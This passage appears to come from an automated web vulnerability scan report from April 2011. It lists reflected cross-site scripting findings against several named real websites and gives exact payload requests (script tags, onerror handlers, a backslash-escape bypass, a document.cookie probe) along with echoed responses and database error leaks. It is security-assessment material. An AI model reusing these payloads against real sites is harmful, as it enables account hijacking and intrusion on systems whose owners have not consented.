User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sunday 15-May-1994 12:00:00 GMT
Date: Sun, 17 Apr 2011 13:55:01 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=172837142;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: CFTOKEN=71173826;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: JSESSIONID=843026b25bd8e385f77c781a33293677206c;path=/
Content-Length: 2684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- *** P
...[SNIP]...
<form action="/add/index.cfm?6bfaa"><script>alert(1)</script>8d9f2554263=1" method="post" name="l" id="l">
...[SNIP]...

4.153. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2413"><a>4930429a96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grabf2413"><a>4930429a96f/addItemWithUrl HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22268%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grabf2413"><a>4930429a96f/addItemWithUrl.html" />
...[SNIP]...

4.154. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f220"><a>389513feb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grab/addItemWithUrl3f220"><a>389513feb5b HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:23 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22526%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grab/addItemWithUrl3f220"><a>389513feb5b.html" />
...[SNIP]...

4.155. http://www.kaboodle.com/grab/addItemWithUrl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f9f"><script>alert(1)</script>e350adcdd3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /grab/addItemWithUrl?a5f9f"><script>alert(1)</script>e350adcdd3f=1 HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22267%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 3118
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>


            <link r
...[SNIP]...
<input type="hidden" name="a5f9f"><script>alert(1)</script>e350adcdd3f" value="1"/>
...[SNIP]...

4.156. http://www.kaboodle.com/za/additem [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /za/additem

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea03"><a>2463a037575 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /zaaea03"><a>2463a037575/additem?a5f9f= HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/grab/addItemWithUrl?a5f9f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee350adcdd3f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ss=""; pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; sd=%7B%22mv%22%3A%22654%22%2C%22mv_s%22%3A%221%22%7D; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26D57BF7851D2609-60000130002CA7D2[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:24 GMT
Content-Length: 70270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/zaaea03"><a>2463a037575/additem.html" />
...[SNIP]...

4.157. http://www.kirtsy.com/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kirtsy.com
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc309\"><img src=a onerror=alert(1)>f2948ed7988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988=1 HTTP/1.1
Host: www.kirtsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 20799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="return" value="/submit.php?fc309\"><img src=a onerror=alert(1)>f2948ed7988=1"/>
...[SNIP]...

4.158. http://www.mister-wong.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 was submitted in the REST URL parameter 1. This input was echoed as 4f462"><img src=a onerror=alert(1)>7a35b20e713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.php4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:14:46 GMT
Server: Apache
Set-Cookie: wongsess=178585a74b2117df7bb2ef56a6ca693c; expires=Wed, 16 Apr 2036 20:14:46 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 5168
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div id="main" class="c_index.php4f462"><img src=a onerror=alert(1)>7a35b20e713">
...[SNIP]...

4.159. http://www.morrisonmahoney.com/location.asp [loid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /location.asp

Issue detail

The value of the loid request parameter is copied into the HTML document as plain text between tags. The payload 99921<script>alert(1)</script>08f8719032 was submitted in the loid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /location.asp?loid=499921<script>alert(1)</script>08f8719032 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1526
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'location_id = 499921<script>alert(1)</script>08f8719032'.</td>
...[SNIP]...

4.160. http://www.morrisonmahoney.com/locations.asp [stid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /locations.asp

Issue detail

The value of the stid request parameter is copied into the HTML document as plain text between tags. The payload 5f04c<script>alert(1)</script>d8c433e5d2 was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locations.asp?stid=35f04c<script>alert(1)</script>d8c433e5d2 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1524
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'state_id=35f04c<script>alert(1)</script>d8c433e5d2'.</td>
...[SNIP]...

4.161. http://www.morrisonmahoney.com/newsrelease.asp [nrid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /newsrelease.asp

Issue detail

The value of the nrid request parameter is copied into the HTML document as plain text between tags. The payload ec521<script>alert(1)</script>6edfa1b3e51 was submitted in the nrid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsrelease.asp?nrid=534ec521<script>alert(1)</script>6edfa1b3e51 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1534
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'news_id = 534ec521<script>alert(1)</script>6edfa1b3e51'.</td>
...[SNIP]...

4.162. http://www.mylinkvault.com/link-page.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mylinkvault.com
Path:   /link-page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe9b"><script>alert(1)</script>0aa220655c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1 HTTP/1.1
Host: www.mylinkvault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Set-Cookie: PHPSESSID=vp85qklqj15vc4a1q0jtqd3le4; path=/; domain=.mylinkvault.com
Vary: Accept-Encoding
Content-Length: 4249
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE php PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<tit
...[SNIP]...
<input type="hidden" name="login_referer" value="/link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1" />
...[SNIP]...

4.163. http://www.pandasecurity.com/activescan/requirements/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pandasecurity.com
Path:   /activescan/requirements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b93"><script>alert(1)</script>9f112544824 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /activescan/requirements/?error=chrome&track=1&Lang=en-US&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1 HTTP/1.1
Host: www.pandasecurity.com
Proxy-Connection: keep-alive
Referer: http://www.pandasecurity.com/activescan/index/?track=1&Lang=en-US&IdPais=63
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=en-US; AlteonP=3e4506e059006be3; ASP.NET_SessionId=nwhv35nnylyjcxamklrn3y55; Track=1; __utmz=216749847.1303044902.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=216749847.633268075.1303044902.1303044902.1303044902.1; __utmc=216749847; __utmb=216749847.2.10.1303044902

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Refresh: 28790
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sun, 17 Apr 2011 13:00:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:00:18 GMT
Connection: close
Set-Cookie: Language=en-US; expires=Tue, 17-Apr-2012 13:00:01 GMT; path=/activescan
Content-Length: 21102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
   <head>
       <link type="image/x-icon" href="/activescan/images/favicon.ico" rel="shortcut ico
...[SNIP]...
<a href="http://www.pandasecurity.com/activescan/requirements/?lang=de-DE&error=chrome&track=1&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1">
...[SNIP]...

4.164. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into the HTML document as plain text between tags. The payload 765fc<script>alert(1)</script>6ee45e5a499 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E765fc<script>alert(1)</script>6ee45e5a499&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:03 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27275

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>765fc<script>alert(1)</script>6ee45e5a499');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.165. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13d35\'%3balert(1)//8e6a0f23626 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed as 13d35\\';alert(1)//8e6a0f23626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=13d35\'%3balert(1)//8e6a0f23626&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:20:47 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27209

<!DOCTYPE html
